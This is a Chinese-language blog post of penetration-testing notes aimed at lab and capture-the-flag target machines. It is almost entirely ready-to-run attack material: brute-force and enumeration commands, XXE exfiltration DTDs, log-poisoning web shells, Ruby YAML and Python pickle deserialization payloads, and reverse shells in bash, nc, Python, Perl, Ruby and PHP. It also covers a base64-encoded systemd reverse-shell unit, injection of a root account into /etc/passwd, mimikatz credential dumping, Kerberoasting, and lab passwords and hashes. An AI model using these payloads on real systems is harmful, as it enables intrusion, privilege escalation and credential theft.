迟来的文章

靶机渗透笔记

2020/10/28 21:19:49

情报收集

实际渗透

靶机渗透

查找IP

主办方给出(比赛)
netdiscover
路由器查看主机IP(桥接且需权限)
根据虚拟机IP分布，用浏览器逐个访问IP(仅限存在WEB服务，不推荐)
nmap -sn -T5 192.168.0.1/24 | grep -B2 -E "(virtual|VMware)"(虚拟机的MAC地址)
arp-scan -l

端口扫描

nmap -p 1-65535 -sV -v -T5 -n 192.168.0.1
-Pn 扫不到Redis，有时候漏了这个信息很难受

Web路径

dirb http://192.168.0.1/ -w
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php -u http://192.168.0.1/

VHOST

wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://flight.htb" -H "Host: FUZZ.flight.htb" --hl 154

SMB信息枚举

enum4linux 192.168.0.1
https://github.com/cddmp/enum4linux-ng

Wordpress

Username: wpscan --url http://192.168.0.1/ -e u
Password: wpscan --url http://192.168.0.1/ --username --wordlist /usr/share/wordlists/rockyou.txt
Plugins: wpscan --url http://192.168.0.1/ --enumerate ap --plugins-detection aggressive
Themes: wpscan --url http://192.168.0.1/ --enumerate at --themes-detection aggressive

漏洞利用

SSH弱口令

hydra -V -I -f -t 64 -L user -P pass ssh://192.168.0.1:22

FTP匿名登入

1 2	ftp 192.168.0.1 anonymous

FTP Banner

SMB弱口令

enum4limux 192.168.0.1
hydra -L user -P pass -I -e n smb://192.168.0.1
smbmap -H 192.168.0.1
smbclient //192.168.0.1/dir -U username

NFS目录挂载

1	nmap -p 111 --script nfs* 192.168.0.1

apt-get install nfs-common
vim /etc/exports
	/share1 *(sync,ro) 192.168.0.1(sync,rw)
systemctl restart rpcbind
systemctl restart nfs
showmount -e 192.168.0.1
	Export list for 192.168.0.1:
	/home/peter *
mkdir /mnt/share1
mount -t nfs 192.168.0.1:/home/peter /mnt/share1
cd /mnt/share1
ls

Web认证

Web页面内容生成字典 : cewl http://192.168.31.39/websec -w pass
hydra-post-form : hydra -I -l contact@hacknos.com -P FuzzDicts-master/passwordDict/top6000.txt -vV -f 192.168.31.39 http-post-form "/websec/login:username=^USER^&password=^PASS^:Wrong"
JWT : https://github.com/brendan-rius/c-jwt-cracker

./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFhYSJ9.Xjc37g2j_pU5SFHYwoPSHWJDEmRVPtfHkbFfGPcn4W0
pip install pyjwt
python
>>> import jwt
>>> jwt.encode({'username': 'admin'}, '1Kun', algorithm='HS256')
'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-wM1ZSwax3ivRK4j54jlaXv-1JjQynjo'

HTTP-Basic认证
- 配合Burp的Intruder模块
- 字典生成脚本
- .htaccess (Apache2)
- .htpasswd (Apache2)

#test.py
import base64
raw = [ 
		'Recon',
		'Web',
		'Home',
		'Service',
		'Blog',
		'hackNos',
		'TroubleShoot',
		'Security',
		'Recon Security',
		'Secure',
		'root',
		'5ecure',
		'admin',
		'Secure@hackNos',
		'Security@hackNos',
		'']
for i in raw:
		for j in raw:
			print base64.b64encode(j + ':' + i)

LDAP

1	nmap 192.168.0.1 -p 389 --script ldap-search --script-args 'ldap.username="cn=admin,dc=admin,dc=local",ldap.password=password'

Redis未授权

config set dir /var/www/html/
config set dbfilename shell.php
set webshell "<?php phpinfo(); ?>"
save

rm -rf ~/.ssh/id*
ssh-keygen -t rsa
(echo -e "\n\n";cat ~/.ssh/id_rsa.pub;echo -e "\n\n") > new.txt
redis-cli -h 192.168.0.1 flushall
cat new.txt | redis-cli -h 1192.168.0.1 -x set crackit
redis-cli -h 192.168.0.1 config set dir /var/lib/redis/.ssh/
redis-cli -h 192.168.0.1 config set dbfilename "authorized_keys"
redis-cli -h 192.168.0.1 save
ssh -i /root/.ssh/id_rsa redis@192.168.0.1

FILE_Includsion

1 2	file:///etc/passwd php://filter/convert.base64-encode/resource=/etc/passwd

1 2	data:text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg== http://192.168.0.2/bfl

SMTP

telnet 192.168.0.1 25
MAIl FROM: <Hacker>
RCPT TO: Username
data
<?php system($_GET['pass']); ?>
.
quit
~~~~~
/index.php?file=/var/mail/Username&pass=nc -e /bin/bash 192.168.0.2 8081

1 2	ssh '<?php system($_GET['pass']); ?>'@192.168.0.1 file.php?file=../../../var/log/auth.log&pass=ls

PHP Filter Chain

https://github.com/synacktiv/php_filter_chain_generator

XXE

LFI

<!DOCTYPE test [ <!ENTITY % xxe SYSTEM "file:///etc/passwd"> %xxe; ]>
<!DOCTYPE test [ <!ENTITY % xxe SYSTEM "file://../../../../../../etc/passwd"> %xxe; ]>
<!DOCTYPE test [ <!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> %xxe; ]>
<!DOCTYPE test [ <!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=../../../../../../etc/passwd"> %xxe; ]>

SSRF

1	<!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://10.10../BFL"> %xxe; ]>

LFI+SSRF

1	<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://10.10../bfl.dtd"> %xxe;]>

# /tmp/bfl.dtd
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=index.php">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://10.10.*.*/?BFL=%file;'>">
%eval;
%exfiltrate;

其他

git信息泄露 :
- /.git/HEAD
- https://github.com/internetwache/GitTools
DS_Store文件泄露 : ds_store_exp
ProFTPd 1.3.5 mod_copy InfoLeak&RCE

nc 192.168.0.1 21
site cpfr /etc/passwd
site cpto /var/www/html/passwd
~~~~~~
nc 192.168.0.1 21
site cpfr /proc/self/cmdline
site cpto /var/www/html/<?php passthru($_GET['cmd']);?>.php
site cpfr /var/www/html/<?php passthru($_GET['cmd']);?>.php
site cpto /var/www/html/shell.php

ShellShock
- env x='() { :;}; echo vulnerable' bash -c "echo this is a test" (CVE-2014-6271)
- env -i X=';() { (a)=>\' bash -c 'echo date'; cat echo (CVE-2014-7169)
- /cgi-bin/* 200
- curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http//192.168.0.1/cgi-bin/
Ruby YAML.Load() Deserialization

---
- !ruby/object:Gem::Installer
	i: x
- !ruby/object:Gem::SpecFetcher
	i: y
- !ruby/object:Gem::Requirement
  requirements:
	!ruby/object:Gem::Package::TarReader
	io: &1 !ruby/object:Net::BufferedIO
	  io: &1 !ruby/object:Gem::Package::TarReader::Entry
		 read: 0
		 header: "abc"
	  debug_output: &1 !ruby/object:Net::WriteAdapter
		 socket: &1 !ruby/object:Gem::RequestSet
			 sets: !ruby/object:Net::WriteAdapter
				 socket: !ruby/module 'Kernel'
				 method_id: :system
			 git_set: "touch /tmp/hacked"
		 method_id: :resolve

java
- pom.xml

https://github.com/jeremylong/DependencyCheck

.NET JSON Deserialize

https://www.cnblogs.com/nice0e3/p/15294585.html
https://systemweakness.com/exploiting-json-serialization-in-net-core-694c111faa15

FastCGI

https://book.hacktricks.xyz/network-services-pentesting/9000-pentesting-fastcgi

Prototype Pollution

https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce#pp2rce-via-env-vars-+-cmdline

权限提升

cap特权

getcap -r / 2> /dev/null

Capabilities	Description
CAP_AUDIT_CONTROL	启用和禁用内核审计；改变审计过滤规则；检索审计状态和过滤规则
CAP_AUDIT_READ	允许通过 multicast netlink 套接字读取审计日志
CAP_AUDIT_WRITE	将记录写入内核审计日志
CAP_BLOCK_SUSPEND	使用可以阻止系统挂起的特性
CAP_CHOWN	修改文件所有者的权限
CAP_DAC_OVERRIDE	忽略文件的 DAC 访问限制
CAP_DAC_READ_SEARCH	忽略文件读及目录搜索的 DAC 访问限制
CAP_FOWNER	忽略文件属主 ID 必须和进程用户 ID 相匹配的限制
CAP_FSETID	允许设置文件的 setuid 位
CAP_IPC_LOCK	允许锁定共享内存片段
CAP_IPC_OWNER	忽略 IPC 所有权检查
CAP_KILL	允许对不属于自己的进程发送信号
CAP_LEASE	允许修改文件锁的 FL_LEASE 标志
CAP_LINUX_IMMUTABLE	允许修改文件的 IMMUTABLE 和 APPEND 属性标志
CAP_MAC_ADMIN	允许 MAC 配置或状态更改
CAP_MAC_OVERRIDE	忽略文件的 DAC 访问限制
CAP_MKNOD	允许使用 mknod() 系统调用
CAP_NET_ADMIN	允许执行网络管理任务
CAP_NET_BIND_SERVICE	允许绑定到小于 1024 的端口
CAP_NET_BROADCAST	允许网络广播和多播访问
CAP_NET_RAW	允许使用原始套接字
CAP_SETGID	允许改变进程的 GID
CAP_SETFCAP	允许为文件设置任意的 capabilities
CAP_SETPCAP	参考 capabilities man page
CAP_SETUID	允许改变进程的 UID
CAP_SYS_ADMIN	允许执行系统管理任务，如加载或卸载文件系统、设置磁盘配额等
CAP_SYS_BOOT	允许重新启动系统
CAP_SYS_CHROOT	允许使用 chroot() 系统调用
CAP_SYS_MODULE	允许插入和删除内核模块
CAP_SYS_NICE	允许提升优先级及设置其他进程的优先级
CAP_SYS_PACCT	允许执行进程的 BSD 式审计
CAP_SYS_PTRACE	允许跟踪任何进程
CAP_SYS_RAWIO	允许直接访问 /devport、/dev/mem、/dev/kmem 及原始块设备
CAP_SYS_RESOURCE	忽略资源限制
CAP_SYS_TIME	允许改变系统时钟
CAP_SYS_TTY_CONFIG	允许配置 TTY 设备
CAP_SYSLOG	允许使用 syslog() 系统调用
CAP_WAKE_ALARM	允许触发一些能唤醒系统的东西(比如 CLOCK_BOOTTIME_ALARM 计时器)

流量监听

1
2
3

tcpdump -D
timeout 120 tcpdump -i interface -w cap.pcap
tcpdump -r cap.pcap

1	timeout 120 tshark -i interface

Shell

python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import os; os.system("/bin/bash")'
perl -e 'exec "/bin/bash";'
awk 'BEGIN {system("/bin/bash")}'

tty(输出至终端/需要注意tty的写入权限)

1
2
3

tty
/dev/pts/0
cat /etc/passwd > /dev/pts/0

密码

密码共用
- WEB账户
- WEB admin
- SSH
- FTP
- MySQL
- root
- Redis
/etc/passwd & /etc/shadow

1 2	hashcat --help \| grep Unix hashcat -m 500 -a 0 -o found.txt crack.hash rockyou.txt

1
2
3

echo '$1$flag$vqjCxzjtRc7PofLYS2lWf/' > passwd
john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long passwd
john --show passwd

unshadow
ssh

1 2	/usr/share/john/ssh2john.py id_rsa > ssh john --wordlist=/usr/share/wordlists/rockyou.txt ssh

wordpress – $P$ – phpass

passwd/shadow	Method	hashcat -m	john --format=
$1	md5	500	md5crypt-long
$2*	bcrypt(Blow Fish)	3200	bcrypt
$5	sha256	7400	sha256crypt
$6	sha512	1800	sha512crypt

本地服务探测

netstat
ss
lsof

UDF提权

插件路径: show variables like 'plugin_dir';
文件权限: SHOW VARIABLES LIKE "secure_file_priv";
- mysqld.conf: “secure_file_priv=”
- 该值为空则无限制
- 该值为NULL则不可写入
- 该值为路径则可写入该路径（不包含子路径）

use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/udf.so'));
select * from foo into dumpfile '%plugin_dir%/udf.so';
create function sys_eval returns string soname 'udf.so';
select sys_eval('id');

UDF文件(dll/so)

Metasploit

/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.dll
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.so
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.dll
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.so

可以使用IDA来查看具体有哪些函数

sys_get
sys_exec
sys_eval
sys_set
sys_bineval

SQLMap

/usr/share/sqlmap/data/udf/mysql/linux/32/lib_mysqludf_sys.so_
/usr/share/sqlmap/data/udf/mysql/linux/64/lib_mysqludf_sys.so_
/usr/share/sqlmap/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
/usr/share/sqlmap/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_

Decode
python .\cloak.py -d -i ..\..\udf\mysql\linux\64\lib_mysqludf_sys.so_ -o linux_udf_64.so

Mysql执行系统命令

system whoami
(version >= 5.7)

SUDO & SUID

https://gtfobins.github.io/

使用Shell脚本进行提权，参数带有空格时需要用引号

SUID: find / -user root -perm -4000 -print 2>/dev/null

1
2
3

sudo su
sudo -i
cat /etc/sudoers

查看可以以sudo模式运行的程序
sudo -l

当sudo权限的命令受到执行路径的限制时，可以使用../来进行bypass
doas
python: python -c 'import os;os.system("/bin/bash")'
- input(): __import__('os').system('/bin/sh')
- lib文件写入命令
- pickle unserialize

import pickle
import base64
import os
class RCE(object):
	def __reduce__(self):
		cmd = ('nc -e /bin/bash 192.168.0.1 8080')
		return os.system, (cmd,)
if __name__ == '__main__':
	print(base64.urlsafe_b64encode(pickle.dumps(RCE())))

import pickle
import urllib
class payload(object):
	def __reduce__(self):
		return (eval,("(open('/flag,txt'),'r).read()",))

print(urllib.quote((pickle.dumps(payload()))))

php: php -r "system('/bin/bash');"
rpm: rpm --eval '%{lua:posix.exec("/bin/bash")}'
dpkg

gem install fpm
mkdir exp && cd exp
echo -e '#!/bin/bash\n/bin/bash' > exp.sh
fpm -s dir -t deb -n exp --before-install exp.sh ./
dpkg -i exp_1.0_amd64.deb

ruby: ruby -e 'exec "/bin/bash"'
gcc: gcc -wrapper /bin/bash,-s .
perl: perl -e 'exec "/bin/bash";'
java:

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;

public class sudo {
	public static void main(String[] args) {
		ProcessBuilder processBuilder = new ProcessBuilder();
	processBuilder.command("/bin/bash", "-c", "whoami > whoami");
		try {
			Process process = processBuilder.start();
			BufferedReader reader =
					new BufferedReader(new InputStreamReader(process.getInputStream()));
			String line;
			while ((line = reader.readLine()) != null) {
				System.out.println(line);
			}
			int exitCode = process.waitFor();
			System.out.println("\nExited with error code : " + exitCode);
		} catch (IOException e) {
			e.printStackTrace();
		} catch (InterruptedException e) {
			e.printStackTrace();
		}
	}
}

1 2	javac sudo.java java sudo

mysql: mysql -e '\! /bin/bash'
nmap
- 2.02 <= nmap -v <=5.21

1 2	nmap --interactive !sh

vim
- 浏览/etc/shadow
- shell

1
2
3

vim
:set shell=/bin/bash
:shell

less
more
nano
cp
- 覆盖passwd（垂直）
- 写入authorized_keys（水平）
- –no-preserve=mode
mv
wget
find
- find . -exec whoami \;
- find . -exec /bin/bash -p\;

1
2
3

读取：***
写入：**2
执行：**4(bash); 1**, *1*, **1(exec)

bash
bash -p
awk
- awk '/RE/{system("cat /tmp/1")}' /etc/passwd >> /etc/passwd
- /tmp/1 是写好的账户信息
- RE用于匹配passwd中某单独一行的结尾部分
tee: echo 1 | tee /etc/passwd
unzip

cat /etc/passwd > passwd
echo data >> passwd
zip new.zip passwd
unzip new.zip -d /etc/

git filter
Git提供了一种过滤机制，允许用户在文件检出或提交到Git存储库时将自定义脚本应用于文件。
过滤机制由两种类型的过滤器组成：clean过滤器和smudge过滤器。clean过滤器用于在将文件提交到Git存储库之前转换文件的内容。smudge过滤器用于在从Git存储库检出文件时转换文件的内容。

echo "python3 -c \"import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('0.0.0.0',9995));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);\"" > /tmp/BFL
chmod +x /tmp/BFL
git init
echo '*.php filter=indent' > /var/www/image/.git/info/attributes
git config filter.indent.clean /tmp/BFL
sudo -u svc /var/www/image/scripts/git-commit.sh

systemctl

[Service]
ExecStart=/bin/bash -c "bash -i >& /dev/tcp/10.10.*.*/9996 0>&1"

[Install]
WantedBy=multi-user.target

echo -n W1NlcnZpY2VdCkV4ZWNTdGFydD0vYmluL2Jhc2ggLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTYuMi85OTk2IDA+JjEiCgpbSW5zdGFsbF0KV2FudGVkQnk9bXVsdGktdXNlci50YXJnZXQ= | base64 -d > /etc/systemd/system/bufferfly.service

$PATH

目标文件为二进制可执行文件
需要知道目标文件所执行的命令
strings查看可执行文件内容

echo

cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd /usr/bin
./shell
whoami

copy

cd /tmp
cp /bin/bash /tmp/ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd /usr/bin
./shell
whoami

symlink

cd /tmp
ln -s /bin/bash ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd /usr/bin
./shell
whoami

mail

cat /var/spool/mail/*

crontab

cat /etc/crontab
ls -la /var/spool/cron/
ls -la /tmp
crontab -e

crontab所执行的命令一般来说是难以通过ps命令来发现的，除非是在命令执行的过程中正好使用ps命令查看进程
这对于耗时长的命令或者是使用脚本循环执行命令来说是可行的，但是对于几乎瞬时完成的命令则是束手无策
可以使用pspy来持续地监视后台进程
https://github.com/DominicBreuker/pspy

一般的crontab设置为整分运行，pspy每分钟的第一秒显示的命令即为crontab的内容
目录权限
- r 列出目录中的内容
- w 在目录中增加删除文件，修改文件名
- x 进入目录以及对目录下的文件进行操作
- r-- 可以在不进入目录的情况下列出目录下的文件，但不能查看文件详细信息
- –x 可以在单独列出已知文件，并查看文件详细信息

passwd可写

ls -l /etc/passwd

1
2
3

openssl passwd -6 hackforfun
	$6$niT81cP.pbbCDVBZ$Tnou8n5zZHkPNF3n0EqZnouOM4eEDCxSS5OeJ21.TbLJe167Igyns87G8JbW2n5ShI23D9RuGtji1NLrRti./1
echo 'test:$6$niT81cP.pbbCDVBZ$Tnou8n5zZHkPNF3n0EqZnouOM4eEDCxSS5OeJ21.TbLJe167Igyns87G8JbW2n5ShI23D9RuGtji1NLrRti./1:0:0::/root:/bin/bash' >> /etc/passwd

系统漏洞提权

CVE-2019-7304

Ubuntu 18.10
Ubuntu 18.04 LTS
Ubuntu 16.04 LTS
Ubuntu 14.04 LTS
2.28 < snapd < 2.37
网络连通

DirtyCow

git clone https://github.com/dirtycow/dirtycow.github.io
cd dirtycow.github.io
gcc dirtyc0w.c -o dirtycow -pthread
./dirtycow /etc/group "$(sed ‘/\(sudo*\)/ s/$/,test/’ /etc/group)"
sudo su

40616.c

文件传输

FTP
SCP
HTTP
- python2 -m SimpleHTTPServer 80 &
- python3 -m http.server 80&
TCP Socket
- nc -lvnp 9999
- bash -c 'exec 3<>/dev/tcp/127.0.0.1/9999; cat /etc/passwd >&3; exec 3>&-'

内网代理

meterpreter(socks4)

1
2
3

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=2020 -f raw > shell.php
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=2020 -f elf > shell.elf
use auxiliary/server/socks4a

portfwd -l 2222 -p 8080 -r 127.0.0.1 (本地服务端口转发/netstat)
earthworm(socks5)
- 访问本地服务
ngork
- https://ngrok.com/
- https://www.tunnelnat.com/
reGeorg
frp
- https://github.com/fatedier/frp

#frpc.ini
[common]
server_addr = 192.168.56.104
server_port = 7000

[sock5_1]
type = tcp
remote_port = 45555
plugin = socks5
plugin_user = user
plugin_passwd = pass
#####################
#frps.ini
[common]
bind_port = 7000
dashboard_port = 7500
dashboard_user = admin
dashboard_pass = admin

nps
- https://github.com/ehang-io/nps
lcx

lcx配合meterpreter进行公网反弹Shell
Server上执行lcx -listen 8888 9999
本地执行lcx -slave Server 8888 Local_IP 7777
并在MSF监听Local_IP上的7777端口
(注意这里不能用127.0.0.1) 
目标机器上meterpreter反弹至Server的8888端口

proxychain
proxifier
sockscap
socat
- socat tcp-listen:1234,fork tcp-connect:localhost:8080
plink
- plink.exe -ssh root@192.168.0.1 -pw password -R 1234:127.0.0.1:3306
sshuttle
- https://github.com/sshuttle/sshuttle
SSH
- LOCAL & REMOTE & SOCKS

Shell

1
2
3

nc.traditional是最早的版本(v1.10-41.1)，该版本具有``-e``的选项，用于反弹shell十分方便
ubuntu中的nc命令则会指向netcat-openbsd，而该版本则没有``-e``的选项，无法用于反弹shell
ncat的版本则比较新，集成于nmap中

#正向Shell
nc -lvvp 8080 -t -e /bin/bash
.............................
nc 192.168.0.1 8000

/bin/bash -i 2>&1 | nc 192.168.0.1 8080
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.0.1 8080 >/tmp/f
nc -e /bin/bash 192.168.0.1 8080
.............................
nc -lvnp 8080

bash

1
2
3

bash -i >& /dev/tcp/192.168.0.1/8080 0>&1
.............................
nc -lvnp 8080

python

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.1',8080));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

1 2	php -r 'exec("/bin/bash -i >& /dev/tcp/192.168.0.1/8080 0>&1")' php -r '$sock=fsockopen("192.168.0.1",8080);exec("/bin/sh -i <&3 >&3 2>&3");'

perl

perl -e 'use Socket;$i="192.168.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

ruby

1
2

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.0.1","8080");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
ruby -rsocket -e'f=TCPSocket.open("192.168.0.1",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

PowerShell

命令多条分隔/命令注入: ;
Secure String

$password = ConvertTo-SecureString 'P@ssw0rd' -AsPlainText -Force
$Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($password)
$result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr)
[System.Runtime.InteropServices.Marshal]::ZeroFreeCoTaskMemUnicode($Ptr)
$result

Windows

信息收集

nmap
dirb
wfuzz
- VHOST: wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://flight.htb" -H "Host: FUZZ.flight.htb" --hl 154
enum4linux
- enum4linux 10.10.10.248
- https://github.com/cddmp/enum4linux-ng
smbmap
- smbmap -H 10.10.10.248 -u "test"
- smbmap -H 10.10.10.248 -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence
smbclient
- smbclient //10.10.10.248/users -U Tiffany.Molina --password='NewIntelligenceCorpUser9876'
- 下载路径

mask ""
recurse ON
prompt OFF
mget active.htb

kerbrute

1	kerbrute userenum -dc-ip 10.10.10.248 -d intelligence.htb users

bloodhound

1
2
3

bloodhound-python -d megacorp.local -u sandra -p "Password1234!" -gc pathfinder.megacorp.local -c all -ns 10.10.10.30
neo4j console
bloodhound

1
2
3

curl https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1 -O
curl https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -O
invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice

lookupsid

1	python lookupsid.py sql_svc:REGGIE1234ronnie@10.10.11.202

pywerview

1	python3 pywerview.py get-netcomputer -u svc_int$ --hashes 47e89a6afd68e3872ef1acaf91d0b2f7 -d intelligence.htb -t dc.intelligence.htb --full-data

procdump

1	./procdump64.exe -accepteula -ma 6216

crackmapexec
- username: crackmapexec smb 10.10.11.187 -d flight -u svc_apache -p 'S@Ss!K@*t13' --users
https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat
https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
AD

get-aduser -filter * -server $dc_domain_name | format-table name,samaccountname -a
get-aduser -identity $username -server $dc_domain_name -properties *
get-adgroup -filter * -server $dc_domain_name | format-table name -a
get-adgroup -identity $groupname -server $dc_domain_name
get-adgroupmember -identity $groupname -server $dc_domain_name
get-adobject
get-addomain -server $dc_domain_name

powerview

get-domain
get-domaincontroller
get-forestdomain
get-domaintrust

get-domainuser
get-domaincomputer
get-domaingroup
get-domaingroupmember
get-domainou

get-domaingpo
get-domaingpolocalgroup
get-domaingpouserlocalgroupmapping

爆破

爆破smb
crackmapexec smb 10.10.10.248 -d intelligence -u user -p NewIntelligenceCorpUser9876 --continue-on-success
爆破winrm
crackmapexec winrm 10.10.10.149 -d heist -u user -p pass

获取凭证

gMSADumper

1 2	wget https://raw.githubusercontent.com/micahvandeusen/gMSADumper/main/gMSADumper.py python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb -l 10.10.10.248

allowed_to_delegate_to

python3 pywerview.py get-netcomputer -u svc_int$ --hashes 47e89a6afd68e3872ef1acaf91d0b2f7 -d intelligence.htb -t dc.intelligence.htb --full-data
python3 getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :47e89a6afd68e3872ef1acaf91d0b2f7 -impersonate administrator
export KRB5CCNAME=administrator.ccache
python3 secretsdump.py -k dc.intelligence.htb -just-dc

GPP

1	gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

PortableKanban

#!/usr/bin/env python3
import json
import base64
from des import * # python3 -m pip install des
import sys

def decode(hash):
	hash = base64.b64decode(hash.encode('utf-8'))
	key = DesKey(b"7ly6UznJ")
	return key.decrypt(hash,initial=b"XuVUm5fR",padding=True).decode('utf-8')

print(decode("Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi"))

mimikatz

SAM

1
2
3

privilege::debug
token::elevate
lsadump::sam

LSASS

1
2
3

privilege::debug
token::elevate
sekurlsa::msv

LOGGED

1
2
3

privilege::debug
token::elevate
sekurlsa::logonPasswords

REGISTRY

1
2
3

privilege::debug
token::elevate
lsadump::secrets

KERBEROS_KEYS

1 2	privilege::debug sekurlsa::ekeys

KERBEROS_TICKETS

1
2
3

privilege::debug
sekurlsa::tickets /export
kerberos::ptt $ticket_file

PASS_THE_KEY

privilege::debug
sekurlsa::ekeys
sekurlsa::pth /user:$username /domain:$domain /rc4:$rc4 /run:"nc64.exe -e cmd.exe $ip $port"
sekurlsa::pth /user:$username /domain:$domain /aes128:$aes128 /run:"nc64.exe -e cmd.exe $ip $port"
sekurlsa::pth /user:$username /domain:$domain /aes256:$aes256 /run:"nc64.exe -e cmd.exe $ip $port"

Kerberoasting

$TGS\_Ticket = RC4-HMAC(Plain = Timestamp, Key = Server\_NTLM)$
Plain格式固定且已知，枚举Key解密TGS_Tikect，格式匹配即得到Server_NTLM

一般用于攻击服务用户账号

1
2
3

python GetUserSPNs.py -dc-ip $ip $domain/$user:$password -request
python GetUserSPNs.py -dc-ip $ip $domain/$user:$password -request-user $spn_user -save -outfile tgs
hashcat -m 13100 tgs /usr/share/wordlists/rockyou.txt

https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1

1 2	. .\invoke-kerberoast invoke-kerberoast -outputformat hashcat

Rubeus

1 2	.\Rubeus.exe kerberoast /simple /nowarp .\Rubeus.exe kerberoast /user:mssql_svc /nowarp

AS-REP Roasting

Typically that requires credentials on the domain to authenticate with. There is an option for an account to have the property “Do not require Kerberos preauthentication” or UF_DONT_REQUIRE_PREAUTH set to true. AS-REP Roasting is an attack against Kerberos for these accounts.
https://0xdf.gitlab.io/2020/03/21/htb-forest.html#as-rep-roasting

Username requiured

1
2
3

python GetNPUsers.py -dc-ip $ip $domain/$username:$password -request -outfile tgt
python GetNPUsers.py -dc-ip $ip $domain/ -usersfile $user_file -request -outfile tgt
hashcat -m 18200 tgt /usr/share/wordlists/rockyou.txt

Rubeus

1	.\Rubeus.exe asreproast /user:squid_svc /nowarp

获取运行程序、服务用户凭证

监听

responder

1	responder -I tun0 -A

smbserver

1	python smbserver.py -ip 10.10.. -smb2support BFL /tmp

rogue ldap server

sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd
sudo dpkg-reconfigure -p low slapd
echo -e "#olcSaslSecProps.ldif\ndn: cn=config\nreplace: olcSaslSecProps\nolcSaslSecProps: noanonymous,minssf=0,passcred" > olcSaslSecProps.ldif
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart
ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms
sudo tcpdump -SX -i breachad tcp port 389

服务

Invoke-WebRequest

访问域中web*域名80端口

# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory 
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
	try {
		$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
		if(.StatusCode -ne 200)
		{
			Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
		}
	} 
		catch {}
}

伪造域名

1
2

wget https://raw.githubusercontent.com/dirkjanm/krbrelayx/master/dnstool.py
